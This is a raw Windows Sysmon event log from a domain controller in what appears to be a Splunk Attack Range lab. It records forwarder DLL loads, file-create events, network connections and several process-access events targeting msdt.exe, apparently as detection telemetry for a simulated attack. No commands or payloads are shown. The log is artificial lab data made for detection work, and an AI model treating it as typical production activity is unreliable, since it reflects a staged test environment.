13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x8000000000000000100324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 23542300x8000000000000000100342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:53.482{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12AEBE66A53E0E618997B999279B96B6,SHA256=7A7A673E3D3F0DE64BDEE5D9CFF81104467D1E3C2CDB55152F1B48A364EE24CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.147{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local62401- 23542300x8000000000000000100344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:54.560{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F641246DA04139D9FA35D005218150,SHA256=DCDC8156393B69A34D233EEFE71D01768455CEB46C393883E9500116DF67A90D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.226{326FD73D-A4D7-6294-7701-000000005502}5708C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53350-false52.109.76.30-443https 23542300x8000000000000000100346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:55.654{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCFA0A90F8052A959FFD4E2BE817DBD,SHA256=165AFC644C0D69899F832C5C27FB8834483ED01D35120F82DDC7492002885AFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.003{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53351-false10.0.1.12-8000- 23542300x8000000000000000100348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:56.638{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16AA041D50D25DAFECA9198EEBB7F457,SHA256=70F3E5D23E889F2A08420E41EE668D465779D6BCC627182D108D1F88FAFE7208,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.253{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local64545- 23542300x8000000000000000100349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:57.732{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5C61FA085A13D00ED5A0CDA8461076,SHA256=199A04806FBADC970E239CB3D84C878F7E726E162D7FCBF312D9D34727DAAE9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:58.825{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BE740C625E6AA9724B766D076AD13F0,SHA256=D9189E4571F08E35D4D9ECF8405D6A276BEEF8A4F3A557F04EF1CF2D2958D5EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:59.919{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A2572EC9154EABE5FEDC05B95FD942,SHA256=2DB9E80AE07611609ADAE4A617CB1800FBFF6485494A8DADF82BA261FC69EF91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:57.971{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53352-false10.0.1.12-8000- 23542300x8000000000000000100352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:01.013{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80DDD4DBF581B05303504510AC477A15,SHA256=3F82BB5319A2B76AEABB59827DE591A5980D3976217F5BFB7B6179BF0F5F75BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:02.107{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE305EF6288880D0A31A54ACEA906BE,SHA256=968B81FD5283C678D2EBEABB4FBB32361739E0E2A4B3A9C1609E3A5F5F2BFD8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:03.200{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D53B8C7FF18DC8E4CB6DF4BDC33EFCE8,SHA256=C76BA053427666BA7FDB63F90D9BABF9493C0AD6BE0047BEDCEE70419CCC28EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:04.294{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F9D1D10B629467EC0BC71C1CD799CF,SHA256=BE99FB2D6C42CE8151DB6774AFF1A198F430F763576EBE74A1DFB3E29B7AF104,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.982{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 